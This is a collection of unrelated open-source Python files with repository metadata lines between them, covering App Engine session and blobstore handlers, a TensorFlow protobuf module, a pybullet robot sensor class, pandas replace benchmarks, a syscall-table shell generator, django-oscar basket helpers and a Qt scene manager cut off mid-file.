photo_key): # even with arguments, we call with dispatch(self) # Session is stored on both client browser and our database session_1 = self.session_store.get_session(name='dbcookie',backend='datastore') previous_value_1 = session_1.get("my_attr_name") self.response.out.write('on db, ' + str(previous_value_1)) session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "") self.response.out.write('<br>') # Session is stored on client browser only session_2 = self.session_store.get_session(name='clientcookie') previous_value_2 = session_2.get('my_attr_name') self.response.out.write('on client browser, ' + str(previous_value_2)) session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "") self.response.out.write('<br>') # Session is stored on both client browser and our memcache for fast access session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache") previous_value_3 = session_3.get('my_attr_name') self.response.out.write('on memcache, ' + str(previous_value_3)) session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "") # this is needed for webapp2 sessions to work def dispatch(self): # Get a session store for this request. self.session_store = sessions.get_store(request=self.request) try: webapp2.RequestHandler.dispatch(self) finally: # Save all sessions. 
self.session_store.save_sessions(self.response) from google.appengine.ext.webapp import blobstore_handlers from google.appengine.ext import blobstore class MyUploadHandler(blobstore_handlers.BlobstoreUploadHandler): def my_post_dispatch(self, *args, **kwargs): ''' A Fake dispatch method that you want to call inside your Route() Just an imitation of the webapp2 style dispatch() with limited functions ''' self.session_store = sessions.get_store(request=self.request) try: if self.request.method == 'POST': self.post(*args, **kwargs) # since webapp doesn't have dispatch() method like webapp2, we do it manually else: self.error(405) self.response.out.write('Method not allowed') finally: # Save all sessions. self.session_store.save_sessions(self.response) def wrapper(func): def dest(self, *args, **kwargs): print 'before decorated' # for your future use. you can write wrapper like 'user_required' func(self,*args, **kwargs) print 'after decorated' return dest @wrapper def post(self): # Get all the uploaded file info myfiles = self.get_uploads('file') # this is a list of blob key info # You do some operations on the myfiles, maybe transform them # maybe associate them with other ndb entities in your database # ... # But we also want to manipulate with the session, RIGHT ??? # Session is stored on both client browser and our database session_1 = self.session_store.get_session(name='dbcookie',backend='datastore') previous_value_1 = session_1.get("my_attr_name") self.response.out.write('on db, ' + str(previous_value_1)) session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "") self.response.out.write('<br>') # Session is stored on client browser only session_2 = self.session_store.get_session(name='clientcookie') previous_value_2 = session_2.get('my_attr_name') self.response.out.write('on client browser, ' + str(previous_value_2)) session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "") self.response.out.write('<br>') # Session is stored on both client browser and our memcache for fast access session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache") previous_value_3 = session_3.get('my_attr_name') self.response.out.write('on memcache, ' + str(previous_value_3)) session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "") # Finally, I delete them,just in case you won't let it go. [blobstore.delete(each.key()) for each in self.get_uploads('file')] class ServeBlobHandler(blobstore_handlers.BlobstoreDownloadHandler): ''' Serve the images to the public ''' def my_get_dispatch(self, *args, **kwargs): ''' A Fake dispatch method that you want to call inside your Route() Just an imitation of the webapp2 style dispatch() with limited functions ''' self.session_store = sessions.get_store(request=self.request) try: if self.request.method == 'GET': self.get(*args, **kwargs) # this is the real get method we want here else: self.error(405) self.response.out.write('Method not allowed') finally: # Save all sessions. self.session_store.save_sessions(self.response) def wrapper(func): def dest(self, *args, **kwargs): print 'before decorated' # for your future use. you can write wrapper like 'user_required' func(self,*args, **kwargs) print 'after decorated' return dest @wrapper def get(self, photo_key): if not blobstore.get(photo_key): self.error(404) else: self.send_blob(photo_key)
apache-2.0
-2,670,067,092,621,807,600
45.266667
120
0.617844
false
3.975521
false
false
false
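The handlers above still need to be mounted in a webapp2 WSGI application with a session secret configured. A sketch of that wiring, assuming it sits alongside the handler classes; the routes and the secret key are placeholders:

import webapp2

config = {
    'webapp2_extras.sessions': {
        'secret_key': 'replace-with-a-real-secret',
    },
}

app = webapp2.WSGIApplication([
    webapp2.Route('/', handler=MainHandler),
    webapp2.Route('/photo/<photo_key>', handler=MainHandlerWithArguments),
    # These two handlers ship their own dispatch methods, so the routes point
    # at them explicitly.
    webapp2.Route('/upload', handler=MyUploadHandler,
                  handler_method='my_post_dispatch', methods=['POST']),
    webapp2.Route('/serve/<photo_key>', handler=ServeBlobHandler,
                  handler_method='my_get_dispatch', methods=['GET']),
], config=config, debug=True)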
fluxcapacitor/pipeline
libs/pipeline_model/tensorflow/core/framework/tensor_slice_pb2.py
1
4870
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: tensorflow/core/framework/tensor_slice.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='tensorflow/core/framework/tensor_slice.proto', package='tensorflow', syntax='proto3', serialized_pb=_b('\n,tensorflow/core/framework/tensor_slice.proto\x12\ntensorflow\"\x80\x01\n\x10TensorSliceProto\x12\x33\n\x06\x65xtent\x18\x01 \x03(\x0b\x32#.tensorflow.TensorSliceProto.Extent\x1a\x37\n\x06\x45xtent\x12\r\n\x05start\x18\x01 \x01(\x03\x12\x10\n\x06length\x18\x02 \x01(\x03H\x00\x42\x0c\n\nhas_lengthB2\n\x18org.tensorflow.frameworkB\x11TensorSliceProtosP\x01\xf8\x01\x01\x62\x06proto3') ) _TENSORSLICEPROTO_EXTENT = _descriptor.Descriptor( name='Extent', full_name='tensorflow.TensorSliceProto.Extent', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='start', full_name='tensorflow.TensorSliceProto.Extent.start', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='length', full_name='tensorflow.TensorSliceProto.Extent.length', index=1, number=2, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ _descriptor.OneofDescriptor( name='has_length', full_name='tensorflow.TensorSliceProto.Extent.has_length', index=0, containing_type=None, fields=[]), ], serialized_start=134, serialized_end=189, ) _TENSORSLICEPROTO = _descriptor.Descriptor( name='TensorSliceProto', full_name='tensorflow.TensorSliceProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='extent', full_name='tensorflow.TensorSliceProto.extent', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[_TENSORSLICEPROTO_EXTENT, ], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=61, serialized_end=189, ) _TENSORSLICEPROTO_EXTENT.containing_type = _TENSORSLICEPROTO _TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length'].fields.append( _TENSORSLICEPROTO_EXTENT.fields_by_name['length']) _TENSORSLICEPROTO_EXTENT.fields_by_name['length'].containing_oneof = _TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length'] _TENSORSLICEPROTO.fields_by_name['extent'].message_type = _TENSORSLICEPROTO_EXTENT DESCRIPTOR.message_types_by_name['TensorSliceProto'] = _TENSORSLICEPROTO _sym_db.RegisterFileDescriptor(DESCRIPTOR) TensorSliceProto = _reflection.GeneratedProtocolMessageType('TensorSliceProto', (_message.Message,), dict( Extent = _reflection.GeneratedProtocolMessageType('Extent', 
(_message.Message,), dict( DESCRIPTOR = _TENSORSLICEPROTO_EXTENT, __module__ = 'tensorflow.core.framework.tensor_slice_pb2' # @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto.Extent) )) , DESCRIPTOR = _TENSORSLICEPROTO, __module__ = 'tensorflow.core.framework.tensor_slice_pb2' # @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto) )) _sym_db.RegisterMessage(TensorSliceProto) _sym_db.RegisterMessage(TensorSliceProto.Extent) DESCRIPTOR.has_options = True DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030org.tensorflow.frameworkB\021TensorSliceProtosP\001\370\001\001')) try: # THESE ELEMENTS WILL BE DEPRECATED. # Please use the generated *_pb2_grpc.py files instead. import grpc from grpc.beta import implementations as beta_implementations from grpc.beta import interfaces as beta_interfaces from grpc.framework.common import cardinality from grpc.framework.interfaces.face import utilities as face_utilities except ImportError: pass # @@protoc_insertion_point(module_scope)
apache-2.0
6,296,427,293,374,174,000
35.343284
406
0.742094
false
3.27505
false
true
false
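tensor_slice_pb2.py is generated code, so its public surface is just the TensorSliceProto message. A round-trip sketch, assuming the module is importable under the usual tensorflow.core.framework package (here it is vendored under libs/pipeline_model):

from tensorflow.core.framework import tensor_slice_pb2

# Slice covering elements [0, 10) of the first dimension; an Extent with the
# has_length oneof unset stands for the full extent of that dimension.
slice_proto = tensor_slice_pb2.TensorSliceProto()
first = slice_proto.extent.add()
first.start = 0
first.length = 10
slice_proto.extent.add()  # second dimension: full extent

wire = slice_proto.SerializeToString()
restored = tensor_slice_pb2.TensorSliceProto.FromString(wire)
assert restored.extent[0].length == 10
assert not restored.extent[1].HasField('length')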
nrz/ylikuutio
external/bullet3/examples/pybullet/gym/pybullet_envs/minitaur/envs_v2/sensors/sensor.py
2
15551
# Lint as: python3 """A sensor prototype class. The concept is explained in: go/minitaur-gym-redesign-1.1 """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from typing import Any, Iterable, Optional, Sequence, Text, Tuple, Union import gin import gym import numpy as np from pybullet_envs.minitaur.robots import robot_base from pybullet_envs.minitaur.robots import time_ordered_buffer _ARRAY = Sequence[float] _FloatOrArray = Union[float, _ARRAY] _DataTypeList = Iterable[Any] # For sensor with multiput outputs, key of the main observation in output dict. MAIN_OBS_KEY = "" # This allows referencing np.float32 in gin config files. For example: # lidar_sensor.LidarSensor.dtype = @np.float32 gin.external_configurable(np.float32, module="np") gin.external_configurable(np.float64, module="np") gin.external_configurable(np.uint8, module="np") # Observation blenders take a pair of low/high values. The low/high is measured # by the latency of the observation. So the low value is actually newer in time # and high value older. The coeff [0, 1] can be thinked as the distance between # the low and high value value, with 0 being 100% low value and 1 as 100% high # value. def linear_obs_blender(low_value: Any, high_value: Any, coeff: float): """Linear interpolation of low/high values based on coefficient value.""" return low_value * (1 - coeff) + high_value * coeff def closest_obs_blender(low_value: Any, high_value: Any, coeff: float): """Choosing the high or low value based on coefficient value.""" return low_value if coeff < 0.5 else high_value def newer_obs_blender(low_value: Any, unused_high_value: Any, unused_coeff: float): """Always choosing low value, which is the newer value between low/high.""" return low_value def older_obs_blender(unused_low_value: Any, high_value: Any, unused_coeff: float): """Always choosing the high value, which is the older value between low/high.""" return high_value @gin.configurable class Sensor(object): """A prototype class of sensors.""" def __init__( self, name: Text, sensor_latency: _FloatOrArray, interpolator_fn: Any, enable_debug_visualization: bool = False, ): """A basic constructor of the sensor. We do not provide a robot instance during __init__, as robot instances may be reloaded/recreated during the simulation. Args: name: the name of the sensor sensor_latency: There are two ways to use this expected sensor latency. For both methods, the latency should be in the same unit as the sensor data timestamp. 1. As a single float number, the observation will be a 1D array. For real robots, this should be set to 0.0. 2. As an array of floats, the observation will be a 2D array based on how long the history need to be. Thus, [0.0, 0.1, 0.2] is a history length of 3. Observations are stacked on a new axis appended after existing axes. interpolator_fn: Function that controls how to interpolate the two values that is returned from the time ordered buffer. enable_debug_visualization: Whether to draw debugging visualization. """ self._robot = None self._name = name # Observation space will be implemented by derived classes. 
self._observation_space = None self._sensor_latency = sensor_latency self._single_latency = True if isinstance(sensor_latency, (float, int)) else False self._enable_debug_visualization = enable_debug_visualization if not self._is_valid_latency(): raise ValueError("sensor_latency is expected to be a non-negative number " "or a non-empty list of non-negative numbers.") self._interpolator_fn = interpolator_fn or newer_obs_blender self._axis = -1 timespan = sensor_latency if self._single_latency else max(sensor_latency) self._observation_buffer = time_ordered_buffer.TimeOrderedBuffer( max_buffer_timespan=timespan) def _is_valid_latency(self): if self._single_latency: return self._sensor_latency >= 0 if self._sensor_latency: return all(value >= 0 for value in self._sensor_latency) return False def get_name(self) -> Text: return self._name @property def is_single_latency(self) -> bool: return self._single_latency @property def observation_space(self) -> gym.spaces.Space: return self._observation_space @property def enable_debug_visualization(self): return self._enable_debug_visualization @enable_debug_visualization.setter def enable_debug_visualization(self, enable): self._enable_debug_visualization = enable def get_observation_datatype(self): """Returns the data type for the numpy structured array. It is recommended to define a list of tuples: (name, datatype, shape) Reference: https://docs.scipy.org/doc/numpy-1.15.0/user/basics.rec.html Ex: return [('motor_angles', np.float64, (8, ))] # motor angle sensor return [('IMU_x', np.float64), ('IMU_z', np.float64), ] # IMU Will be deprecated (b/150818246) in favor of observation_space. Returns: datatype: a list of data types. """ raise NotImplementedError("Deprecated. Are you using the old robot class?") def get_lower_bound(self): """Returns the lower bound of the observation. Will be deprecated (b/150818246) in favor of observation_space. Returns: lower_bound: the lower bound of sensor values in np.array format """ raise NotImplementedError("Deprecated. Are you using the old robot class?") def get_upper_bound(self): """Returns the upper bound of the observation. Will be deprecated (b/150818246) in favor of observation_space. Returns: upper_bound: the upper bound of sensor values in np.array format """ raise NotImplementedError("Deprecated. Are you using the old robot class?") def _get_original_observation(self) -> Tuple[float, Any]: """Gets the non-modified observation. Different from the get_observation, which can pollute and sensor data with noise and latency, this method shall return the best effort measurements of the sensor. For simulated robots, this will return the clean data. For reals robots, just return the measurements as is. All inherited class shall implement this method. Returns: The timestamp and the original sensor measurements. Raises: NotImplementedError for the base class. """ raise NotImplementedError("Not implemented for base class." "") def get_observation(self): """Returns the observation data. 
Returns: observation: the observed sensor values in np.array format """ obs = self._observation_buffer.get_delayed_value(self._sensor_latency) if self._single_latency: if isinstance(self._observation_space, gym.spaces.Dict): return self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff) else: return np.asarray( self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff)) else: if isinstance(self._observation_space, gym.spaces.Dict): # interpolate individual sub observation interpolated = [ self._interpolator_fn(data.value_0, data.value_1, data.coeff) for data in obs ] stacked_per_sub_obs = {} for k in interpolated[0]: stacked_per_sub_obs[k] = np.stack( np.asarray([d[k] for d in interpolated]), axis=self._axis) return stacked_per_sub_obs else: obs = np.asarray([ self._interpolator_fn(data.value_0, data.value_1, data.coeff) for data in obs ]) return np.stack(obs, axis=self._axis) def set_robot(self, robot: robot_base.RobotBase): """Set a robot instance.""" self._robot = robot def get_robot(self): """Returns the robot instance.""" return self._robot def on_reset(self, env): """A callback function for the reset event. Args: env: the environment who invokes this callback function. """ self._env = env self._observation_buffer.reset() self.on_new_observation() def on_step(self, env): """A callback function for the control step event. Args: env: the environment who invokes this callback function. """ pass def visualize(self): """Visualizes the sensor information.""" pass def on_new_observation(self): """A callback for each observation received. To be differentiated from on_step, which will be called only once per control step (i.e. env.step), this API will be called everytime in the substep/action repeat loop, when new observations are expected. Each derived sensor class should implement this API by implementing: my_obs = call env/robot api to get the observation self._observation_buffer.add(my_obs) """ timestamp, obs = self._get_original_observation() if self._enable_debug_visualization: self.visualize() self._observation_buffer.add(timestamp, obs) def on_terminate(self, env): """A callback function for the terminate event. Args: env: the environment who invokes this callback function. """ pass def _stack_space(self, space: Union[gym.spaces.Box, gym.spaces.Dict], dtype: np.dtype = None) -> Any: """Returns stacked version of observation space. This stacks a gym.spaces.Box or gym.spaces.Dict action space based on the length of the sensor latency and the axis for stacking specified in the sensor. A gym.spaces.Box is just stacked, but a gym.spaces.Dict is recursively stacked, preserving its dictionary structure while stacking any gym.spaces.Box contained within. For example, the input action space: gym.spaces.Dict({ 'space_1': gym.spaces.Box(low=0, high=10, shape=(1,)), 'space_2': gym.spaces.Dict({ 'space_3': gym.spaces.Box(low=0, high=10, shape=(2,)), }), })) would be converted to the following if sensor latency was [0, 1]: gym.spaces.Dict({ 'space_1': gym.spaces.Box(low=0, high=10, shape=(1, 2)), 'space_2': gym.spaces.Dict({ 'space_3': gym.spaces.Box(low=0, high=10, shape=(2, 2)), }), })) Args: space: A gym.spaces.Dict or gym.spaces.Box to be stacked. dtype: Datatype for the stacking. Returns: stacked_space: A stacked version of the action space. """ if self._single_latency: return space # Allow sensors such as last_action_sensor to override the dtype. 
dtype = dtype or space.dtype if isinstance(space, gym.spaces.Box): return self._stack_space_box(space, dtype) elif isinstance(space, gym.spaces.Dict): return self._stack_space_dict(space, dtype) else: raise ValueError(f"Space {space} is an unsupported type.") def _stack_space_box(self, space: gym.spaces.Box, dtype: np.dtype) -> gym.spaces.Box: """Returns stacked version of a box observation space. This stacks a gym.spaces.Box action space based on the length of the sensor latency and the axis for stacking specified in the sensor. Args: space: A gym.spaces.Box to be stacked. dtype: Datatype for the stacking Returns: stacked_space: A stacked version of the gym.spaces.Box action space. """ length = len(self._sensor_latency) stacked_space = gym.spaces.Box( low=np.repeat( np.expand_dims(space.low, axis=self._axis), length, axis=self._axis), high=np.repeat( np.expand_dims(space.high, axis=self._axis), length, axis=self._axis), dtype=dtype) return stacked_space def _stack_space_dict(self, space: gym.spaces.Dict, dtype: np.dtype) -> gym.spaces.Dict: """Returns stacked version of a dict observation space. This stacks a gym.spaces.Dict action space based on the length of the sensor latency and the recursive structure of the gym.spaces.Dict itself. Args: space: A gym.spaces.Dict to be stacked. dtype: Datatype for the stacking. Returns: stacked_space: A stacked version of the dictionary action space. """ return gym.spaces.Dict([ (k, self._stack_space(v, dtype)) for k, v in space.spaces.items() ]) def _encode_obs_dict_keys(self, obs_dict): """Encodes sub obs keys of observation dict or observsation space dict.""" return {encode_sub_obs_key(self, k): v for k, v in obs_dict.items()} class BoxSpaceSensor(Sensor): """A prototype class of sensors with Box shapes.""" def __init__(self, name: Text, shape: Tuple[int, ...], lower_bound: _FloatOrArray = -np.pi, upper_bound: _FloatOrArray = np.pi, dtype=np.float64) -> None: """Constructs a box type sensor. Will be deprecated (b/150818246) once we switch to gym spaces. Args: name: the name of the sensor shape: the shape of the sensor values lower_bound: the lower_bound of sensor value, in float or np.array. upper_bound: the upper_bound of sensor value, in float or np.array. dtype: data type of sensor value """ super(BoxSpaceSensor, self).__init__( name=name, sensor_latency=0.0, interpolator_fn=newer_obs_blender) self._shape = shape self._dtype = dtype if isinstance(lower_bound, float): self._lower_bound = np.full(shape, lower_bound, dtype=dtype) else: self._lower_bound = np.array(lower_bound) if isinstance(upper_bound, float): self._upper_bound = np.full(shape, upper_bound, dtype=dtype) else: self._upper_bound = np.array(upper_bound) def set_robot(self, robot): # Since all old robot class do not inherit from RobotBase, we can enforce # the checking here. 
if isinstance(robot, robot_base.RobotBase): raise ValueError( "Cannot use new robot interface RobotBase with old sensor calss.") self._robot = robot def get_shape(self) -> Tuple[int, ...]: return self._shape def get_dimension(self) -> int: return len(self._shape) def get_dtype(self): return self._dtype def get_observation_datatype(self) -> _DataTypeList: """Returns box-shape data type.""" return [(self._name, self._dtype, self._shape)] def get_lower_bound(self) -> _ARRAY: """Returns the computed lower bound.""" return self._lower_bound def get_upper_bound(self) -> _ARRAY: """Returns the computed upper bound.""" return self._upper_bound def get_observation(self) -> np.ndarray: return np.asarray(self._get_observation(), dtype=self._dtype) def _get_original_observation(self) -> Tuple[float, Any]: # Maintains compatibility with the new sensor classes.""" raise NotImplementedError("Not implemented for this class.") def on_new_observation(self): # Maintains compatibility with the new sensor classes.""" pass def encode_sub_obs_key(s: Sensor, sub_obs_name: Optional[Text]): """Returns a sub observation key for use in observation dictionary.""" if sub_obs_name == MAIN_OBS_KEY: return s.get_name() else: return f"{s.get_name()}/{sub_obs_name}"
agpl-3.0
3,822,107,709,921,278,000
33.481153
82
0.663301
false
3.854027
false
false
false
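A concrete sensor derived from the Sensor base class above only has to supply an observation space and _get_original_observation; buffering, latency handling and interpolation are inherited. An untested sketch with made-up values (2-space indentation as in the module):

import gym
import numpy as np

from pybullet_envs.minitaur.envs_v2.sensors import sensor


class ConstantVectorSensor(sensor.Sensor):
  """Made-up sensor that always reports the same 3-vector."""

  def __init__(self, name='constant_vector', sensor_latency=0.0):
    super(ConstantVectorSensor, self).__init__(
        name=name,
        sensor_latency=sensor_latency,
        interpolator_fn=sensor.linear_obs_blender)
    self._observation_space = self._stack_space(
        gym.spaces.Box(low=-1.0, high=1.0, shape=(3,), dtype=np.float32))
    self._clock = 0.0

  def _get_original_observation(self):
    # A real sensor would query the robot or the simulator; this one fabricates
    # a timestamp and a constant reading.
    self._clock += 0.01
    return self._clock, np.array([0.1, 0.2, 0.3], dtype=np.float32)

on_reset() and on_new_observation() push readings into the internal TimeOrderedBuffer, and get_observation() then reads them back through the configured latency and interpolator.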
winklerand/pandas
asv_bench/benchmarks/replace.py
1
2171
from .pandas_vb_common import * class replace_fillna(object): goal_time = 0.2 def setup(self): self.N = 1000000 try: self.rng = date_range('1/1/2000', periods=self.N, freq='min') except NameError: self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute()) self.date_range = DateRange self.ts = Series(np.random.randn(self.N), index=self.rng) def time_replace_fillna(self): self.ts.fillna(0.0, inplace=True) class replace_large_dict(object): goal_time = 0.2 def setup(self): self.n = (10 ** 6) self.start_value = (10 ** 5) self.to_rep = {i: self.start_value + i for i in range(self.n)} self.s = Series(np.random.randint(self.n, size=(10 ** 3))) def time_replace_large_dict(self): self.s.replace(self.to_rep, inplace=True) class replace_convert(object): goal_time = 0.5 def setup(self): self.n = (10 ** 3) self.to_ts = {i: pd.Timestamp(i) for i in range(self.n)} self.to_td = {i: pd.Timedelta(i) for i in range(self.n)} self.s = Series(np.random.randint(self.n, size=(10 ** 3))) self.df = DataFrame({'A': np.random.randint(self.n, size=(10 ** 3)), 'B': np.random.randint(self.n, size=(10 ** 3))}) def time_replace_series_timestamp(self): self.s.replace(self.to_ts) def time_replace_series_timedelta(self): self.s.replace(self.to_td) def time_replace_frame_timestamp(self): self.df.replace(self.to_ts) def time_replace_frame_timedelta(self): self.df.replace(self.to_td) class replace_replacena(object): goal_time = 0.2 def setup(self): self.N = 1000000 try: self.rng = date_range('1/1/2000', periods=self.N, freq='min') except NameError: self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute()) self.date_range = DateRange self.ts = Series(np.random.randn(self.N), index=self.rng) def time_replace_replacena(self): self.ts.replace(np.nan, 0.0, inplace=True)
bsd-3-clause
1,624,599,673,181,421,300
30.014286
91
0.587748
false
3.132756
false
false
false
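The classes above are asv benchmark definitions rather than a library; each setup/time_* pair is collected by the asv runner. For reference, the replace_large_dict case as a standalone snippet:

import numpy as np
import pandas as pd

n = 10 ** 6
start_value = 10 ** 5
to_rep = {i: start_value + i for i in range(n)}
s = pd.Series(np.random.randint(n, size=10 ** 3))

s.replace(to_rep, inplace=True)  # the call time_replace_large_dict measures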
sebastiaangroot/kmaldetect
tools/build/gen_syscall_table.py
1
1860
""" A simple python script to generate a sh table that takes the name of a syscall as input and translates it to the number corrosponding with that syscall. This function is used in the sig_gen.sh script, used to generate an application signature for detection in kmaldetect. Keep in mind that the '\n' characters used here will be translated to your OS's newline convention. """ import sys import getopt def gen_function(content, f): f.write('function get_syscall_index\n') f.write('{\n') f.write('\tcase $1 in\n') for line in content: if line.startswith('#define __NR_') and line.find('stub_') == -1: if line[9:].find('\t') != -1: num = line[line.find('\t', line.find('__NR_')):].lstrip('\t').strip() #num = the characters after the tab / whitespace characters, after the _NR__ name = line[line.find('__NR_') + 5:].split('\t')[0] #name = the characters after the _NR__ but before the tab / whitespace characters elif line[9:].find(' ') != -1: num = line[line.find(' ', line.find('__NR_')):].lstrip(' ').strip() name = line[line.find('__NR_') + 5:].split(' ')[0] else: #There has to be a space or tab after the #define _NR__xxx. This was not the case, so call continue on the for loop continue f.write('\t\t\'' + name + '\')\n') f.write('\t\t\treturn ' + num + '\n') f.write('\t\t\t;;\n') f.write('\tesac\n') f.write('}\n') infile = '' # path to the unistd_xx.h header outfile = '' # path to the outfile, which will be filled with a .sh function for the use in sig_gen.sh content = '' # content of infile opts, args = getopt.getopt(sys.argv[1:], 'i:o:', ['infile=', 'outfile=']) for o, a in opts: if o in ('--infile', '-i'): infile = a elif o in ('--outfile', '-o'): outfile = a with open(infile, 'r') as f: content = f.readlines() f = open(outfile, 'a') gen_function(content, f) f.flush() f.close()
gpl-2.0
9,037,986,725,254,694,000
38.595745
152
0.634409
false
3.059211
false
false
false
lijoantony/django-oscar-api
oscarapi/basket/operations.py
1
3871
"This module contains operation on baskets and lines" from django.conf import settings from oscar.core.loading import get_model, get_class from oscar.core.utils import get_default_currency from oscar.core.prices import Price __all__ = ( 'apply_offers', 'assign_basket_strategy', 'prepare_basket', 'get_basket', 'get_basket_id_from_session', 'get_anonymous_basket', 'get_user_basket', 'store_basket_in_session', 'request_contains_basket', 'flush_and_delete_basket', 'request_contains_line', 'save_line_with_default_currency', ) Basket = get_model('basket', 'Basket') Applicator = get_class('offer.utils', 'Applicator') Selector = None def apply_offers(request, basket): "Apply offers and discounts to cart" if not basket.is_empty: Applicator().apply(request, basket) def assign_basket_strategy(basket, request): # fixes too early import of Selector # TODO: check if this is still true, now the basket models nolonger # require this module to be loaded. global Selector if hasattr(request, 'strategy'): basket.strategy = request.strategy else: # in management commands, the request might not be available. if Selector is None: Selector = get_class('partner.strategy', 'Selector') basket.strategy = Selector().strategy( request=request, user=request.user) apply_offers(request, basket) return basket def prepare_basket(basket, request): assign_basket_strategy(basket, request) store_basket_in_session(basket, request.session) return basket def get_basket(request, prepare=True): "Get basket from the request." if request.user.is_authenticated(): basket = get_user_basket(request.user) else: basket = get_anonymous_basket(request) if basket is None: basket = Basket.objects.create() basket.save() return prepare_basket(basket, request) if prepare else basket def get_basket_id_from_session(request): return request.session.get(settings.OSCAR_BASKET_COOKIE_OPEN) def editable_baskets(): return Basket.objects.filter(status__in=["Open", "Saved"]) def get_anonymous_basket(request): "Get basket from session." basket_id = get_basket_id_from_session(request) try: basket = editable_baskets().get(pk=basket_id) except Basket.DoesNotExist: basket = None return basket def get_user_basket(user): "get basket for a user." try: basket, __ = editable_baskets().get_or_create(owner=user) except Basket.MultipleObjectsReturned: # Not sure quite how we end up here with multiple baskets. # We merge them and create a fresh one old_baskets = list(editable_baskets().filter(owner=user)) basket = old_baskets[0] for other_basket in old_baskets[1:]: basket.merge(other_basket, add_quantities=False) return basket def store_basket_in_session(basket, session): session[settings.OSCAR_BASKET_COOKIE_OPEN] = basket.pk session.save() def request_contains_basket(request, basket): if basket.can_be_edited: if request.user.is_authenticated(): return request.user == basket.owner return get_basket_id_from_session(request) == basket.pk return False def flush_and_delete_basket(basket, using=None): "Delete basket and all lines" basket.flush() basket.delete(using) def request_contains_line(request, line): basket = get_basket(request, prepare=False) if basket and basket.pk == line.basket.pk: return request_contains_basket(request, basket) return False def save_line_with_default_currency(line, *args, **kwargs): if not line.price_currency: line.price_currency = get_default_currency() return line.save(*args, **kwargs)
bsd-3-clause
7,321,325,571,453,484,000
27.463235
72
0.675794
false
3.722115
false
false
false
mtils/ems
ems/qt/graphics/scene_manager.py
1
7140
from ems.typehint import accepts from ems.qt.event_hook_proxy import SignalEventHookProxy from ems.qt import QtWidgets, QtGui, QtCore, QtPrintSupport from ems.qt.graphics.graphics_scene import GraphicsScene, BackgroundCorrector from ems.qt.graphics.graphics_widget import GraphicsWidget from ems.qt.graphics.storage.interfaces import SceneStorageManager from ems.qt.graphics.tool import GraphicsTool from ems.qt.graphics.tool import GraphicsToolDispatcher from ems.qt.graphics.text_tool import TextTool from ems.qt.graphics.pixmap_tool import PixmapTool from ems.qt.graphics.interfaces import Finalizer from ems.qt.graphics.page_item import PageItemHider, PageItem Qt = QtCore.Qt QObject = QtCore.QObject QRectF = QtCore.QRectF pyqtProperty = QtCore.pyqtProperty pyqtSlot = QtCore.pyqtSlot QWidget = QtWidgets.QWidget QVBoxLayout = QtWidgets.QVBoxLayout QToolBar = QtWidgets.QToolBar QSlider = QtWidgets.QSlider QAction = QtWidgets.QAction QKeySequence = QtGui.QKeySequence QPrintPreviewDialog = QtPrintSupport.QPrintPreviewDialog QPainter = QtGui.QPainter class SceneManager(QObject): def __init__(self, parent=None, storageManager=None): super(SceneManager, self).__init__(parent) self._scene = None self._widget = None self._tools = None self._storageManager = None self._importStorageManager = None self._loadAction = None self._saveAction = None self._importAction = None self._exportAction = None self._actions = [] self._finalizers = [BackgroundCorrector(), PageItemHider()] if storageManager: self.setStorageManager(storageManager) def actions(self): if not self._actions: self._populateActions() return self._actions def getScene(self): if not self._scene: self._scene = GraphicsScene() self._scene.deleteRequested.connect(self.deleteIfWanted) return self._scene scene = pyqtProperty(GraphicsScene, getScene) def getWidget(self): if not self._widget: self._widget = GraphicsWidget(scene=self.scene, tools=self.tools) self._addActionsToWidget(self._widget) self._widget.printPreviewRequested.connect(self.showPrintPreviewDialog) return self._widget widget = pyqtProperty(GraphicsWidget, getWidget) def getTools(self): if not self._tools: self._tools = self._createTools() return self._tools tools = pyqtProperty(GraphicsTool, getTools) def load(self, *args): if self._storageManager: return self._storageManager.load() def save(self, *args): if self._storageManager: return self._storageManager.save() def importScene(self, *args): if self._importStorageManager: return self._importStorageManager.load() def exportScene(self, *args): if self._importStorageManager: return self._importStorageManager.save() def getStorageManager(self): return self._storageManager @pyqtSlot(SceneStorageManager) def setStorageManager(self, storageManager): self._storageManager = storageManager self._storageManager.setScene(self.scene) self._storageManager.setTools(self.tools) storageManager 